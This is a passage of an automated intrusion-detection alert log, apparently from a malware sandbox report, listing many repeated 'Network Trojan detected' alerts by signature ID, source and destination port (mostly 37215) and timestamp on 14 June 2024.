                SID:2829579
                Source Port:49104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.163825
                SID:2835222
                Source Port:39372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383037
                SID:2835222
                Source Port:50664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849483
                SID:2829579
                Source Port:50110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025734
                SID:2835222
                Source Port:60576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616533
                SID:2835222
                Source Port:58794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.617511
                SID:2835222
                Source Port:43042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183350
                SID:2829579
                Source Port:49256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011291
                SID:2829579
                Source Port:40166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.913907
                SID:2835222
                Source Port:34634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.366853
                SID:2829579
                Source Port:60340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.737666
                SID:2829579
                Source Port:57206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941768
                SID:2835222
                Source Port:36786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789653
                SID:2835222
                Source Port:50864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.020425
                SID:2835222
                Source Port:36366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.618815
                SID:2835222
                Source Port:49400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052838
                SID:2835222
                Source Port:45728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846590
                SID:2829579
                Source Port:38618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614272
                SID:2829579
                Source Port:51398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967271
                SID:2835222
                Source Port:55086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.033370
                SID:2829579
                Source Port:44772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762787
                SID:2835222
                Source Port:33156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.336570
                SID:2829579
                Source Port:54120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.729890
                SID:2829579
                Source Port:59714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.182701
                SID:2835222
                Source Port:41678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229104
                SID:2829579
                Source Port:58560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383651
                SID:2829579
                Source Port:50678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.343842
                SID:2835222
                Source Port:45394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.565161
                SID:2835222
                Source Port:33942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.809470
                SID:2835222
                Source Port:52362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.424445
                SID:2835222
                Source Port:57776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183225
                SID:2835222
                Source Port:49588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776773
                SID:2829579
                Source Port:36710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.618009
                SID:2835222
                Source Port:56442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915713
                SID:2835222
                Source Port:52976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420009
                SID:2835222
                Source Port:43100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.563826
                SID:2835222
                Source Port:40716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676782
                SID:2829579
                Source Port:33424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.969069
                SID:2829579
                Source Port:32846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.094834
                SID:2835222
                Source Port:44838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013138
                SID:2835222
                Source Port:42500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.943140
                SID:2835222
                Source Port:44400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718102
                SID:2835222
                Source Port:35722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183445
                SID:2829579
                Source Port:48878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201922
                SID:2835222
                Source Port:50722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.163952
                SID:2829579
                Source Port:38096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715591
                SID:2835222
                Source Port:55554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.071396
                SID:2835222
                Source Port:49656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941004
                SID:2829579
                Source Port:34036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411880
                SID:2829579
                Source Port:47222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.643594
                SID:2835222
                Source Port:35694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716183
                SID:2829579
                Source Port:59672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381715
                SID:2829579
                Source Port:40322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074058
                SID:2829579
                Source Port:58430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.165126
                SID:2829579
                Source Port:53158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501551
                SID:2835222
                Source Port:35440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.688427
                SID:2829579
                Source Port:35978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915533
                SID:2829579
                Source Port:51842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133616
                SID:2835222
                Source Port:55306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.672285
                SID:2829579
                Source Port:57364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.857883
                SID:2835222
                Source Port:57610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791772
                SID:2835222
                Source Port:54490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.701546
                SID:2835222
                Source Port:39164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.179171
                SID:2829579
                Source Port:55118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229259
                SID:2835222
                Source Port:54072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.150980
                SID:2829579
                Source Port:47936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859607
                SID:2835222
                Source Port:50378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.180911
                SID:2829579
                Source Port:54532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275657
                SID:2835222
                Source Port:51672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411807
                SID:2829579
                Source Port:35382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.934277
                SID:2829579
                Source Port:54208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.643825
                SID:2835222
                Source Port:39074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.989744
                SID:2835222
                Source Port:37408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763467
                SID:2829579
                Source Port:59034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.725671
                SID:2829579
                Source Port:51120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.339395
                SID:2835222
                Source Port:39730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.727171
                SID:2835222
                Source Port:41870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022346
                SID:2829579
                Source Port:32990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.057226
                SID:2829579
                Source Port:54276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762516
                SID:2835222
                Source Port:58034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.624449
                SID:2835222
                Source Port:51886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.913792
                SID:2835222
                Source Port:55200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.366357
                SID:2835222
                Source Port:57914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942605
                SID:2835222
                Source Port:58740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.177351
                SID:2840515
                Source Port:58430
                Destination Port:23
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.164500
                SID:2829579
                Source Port:42908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.021081
                SID:2835222
                Source Port:48234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.808285
                SID:2835222
                Source Port:43648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504787
                SID:2829579
                Source Port:43534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968032
                SID:2829579
                Source Port:37208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.896426
                SID:2829579
                Source Port:35784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.967097
                SID:2835222
                Source Port:48306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616348
                SID:2835222
                Source Port:46334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470032
                SID:2835222
                Source Port:42860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.449542
                SID:2829579
                Source Port:59584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181040
                SID:2829579
                Source Port:50978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762717
                SID:2829579
                Source Port:60254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.017115
                SID:2829579
                Source Port:41332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.182806
                SID:2835222
                Source Port:32878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662715
                SID:2829579
                Source Port:56660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.772454
                SID:2829579
                Source Port:59464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.724643
                SID:2829579
                Source Port:58520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660977
                SID:2829579
                Source Port:48698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.321939
                SID:2829579
                Source Port:51372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.150934
                SID:2835222
                Source Port:48054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.288939
                SID:2835222
                Source Port:52896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978540
                SID:2829579
                Source Port:49012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.764900
                SID:2829579
                Source Port:50772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.812473
                SID:2829579
                Source Port:45050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.405363
                SID:2835222
                Source Port:55586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.684365
                SID:2829579
                Source Port:46658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.407666
                SID:2835222
                Source Port:52940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.225047
                SID:2835222
                Source Port:52754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791459
                SID:2829579
                Source Port:50274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.986019
                SID:2835222
                Source Port:39006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.015704
                SID:2829579
                Source Port:47868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451600
                SID:2829579
                Source Port:38752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980016
                SID:2835222
                Source Port:53334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.091536
                SID:2829579
                Source Port:36770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.290661
                SID:2835222
                Source Port:48134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.253653
                SID:2835222
                Source Port:33548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.997157
                SID:2835222
                Source Port:49466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.618573
                SID:2835222
                Source Port:53904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715856
                SID:2829579
                Source Port:58584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365714
                SID:2829579
                Source Port:59818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942140
                SID:2829579
                Source Port:59042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.028791
                SID:2835222
                Source Port:48646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501381
                SID:2829579
                Source Port:55928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.564212
                SID:2835222
                Source Port:58866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.342833
                SID:2829579
                Source Port:42838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.322335
                SID:2835222
                Source Port:49404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.969206
                SID:2829579
                Source Port:36542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.857554
                SID:2829579
                Source Port:42080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.176986
                SID:2835222
                Source Port:33534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502938
                SID:2835222
                Source Port:53430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763186
                SID:2829579
                Source Port:56292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.643387
                SID:2829579
                Source Port:35862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013859
                SID:2829579
                Source Port:50920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.338041
                SID:2835222
                Source Port:54162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663553
                SID:2829579
                Source Port:48016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146848
                SID:2829579
                Source Port:58176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410871
                SID:2829579
                Source Port:39430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.027593
                SID:2829579
                Source Port:56826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.759300
                SID:2829579
                Source Port:36586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.681725
                SID:2829579
                Source Port:49224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.772265
                SID:2829579
                Source Port:41272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.045863
                SID:2829579
                Source Port:51138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.705425
                SID:2835222
                Source Port:39018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.985143
                SID:2835222
                Source Port:44034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.909425
                SID:2829579
                Source Port:37230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421426
                SID:2835222
                Source Port:47502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545865
                SID:2835222
                Source Port:51098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978307
                SID:2829579
                Source Port:36158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.671561
                SID:2829579
                Source Port:42078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.020649
                SID:2835222
                Source Port:46002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014690
                SID:2829579
                Source Port:33174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.617562
                SID:2835222
                Source Port:50056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.164194
                SID:2829579
                Source Port:44200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.701233
                SID:2829579
                Source Port:46816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274062
                SID:2829579
                Source Port:44248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.160327
                SID:2829579
                Source Port:52624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.405726
                SID:2835222
                Source Port:59492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.942353
                SID:2835222
                Source Port:33536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.998010
                SID:2835222
                Source Port:33400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.759000
                SID:2835222
                Source Port:59488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019316
                SID:2829579
                Source Port:60066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703055
                SID:2829579
                Source Port:38424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.778378
                SID:2835222
                Source Port:41184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.017154
                SID:2829579
                Source Port:47530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.759409
                SID:2829579
                Source Port:49256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616807
                SID:2835222
                Source Port:37290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.186589
                SID:2835222
                Source Port:46346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944747
                SID:2829579
                Source Port:32842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.016573
                SID:2835222
                Source Port:34848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.829140
                SID:2829579
                Source Port:47248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.548414
                SID:2835222
                Source Port:50980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.640622
                SID:2829579
                Source Port:43810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943995
                SID:2829579
                Source Port:43832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.617653
                SID:2829579
                Source Port:46992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.811652
                SID:2829579
                Source Port:58100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944188
                SID:2829579
                Source Port:41024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.149130
                SID:2835222
                Source Port:33210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.775951
                SID:2835222
                Source Port:45980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.679066
                SID:2829579
                Source Port:41390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.179937
                SID:2835222
                Source Port:56992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073212
                SID:2835222
                Source Port:47634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074427
                SID:2829579
                Source Port:60146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.909302
                SID:2829579
                Source Port:51638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.682259
                SID:2829579
                Source Port:36334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.940848
                SID:2835222
                Source Port:45172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149141
                SID:2835222
                Source Port:47796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.145875
                SID:2835222
                Source Port:58444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.643666
                SID:2829579
                Source Port:56774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202916
                SID:2835222
                Source Port:45662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.034276
                SID:2829579
                Source Port:35540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.450011
                SID:2829579
                Source Port:58536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.913282
                SID:2835222
                Source Port:56442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792686
                SID:2829579
                Source Port:60600
                Destination Port:37215
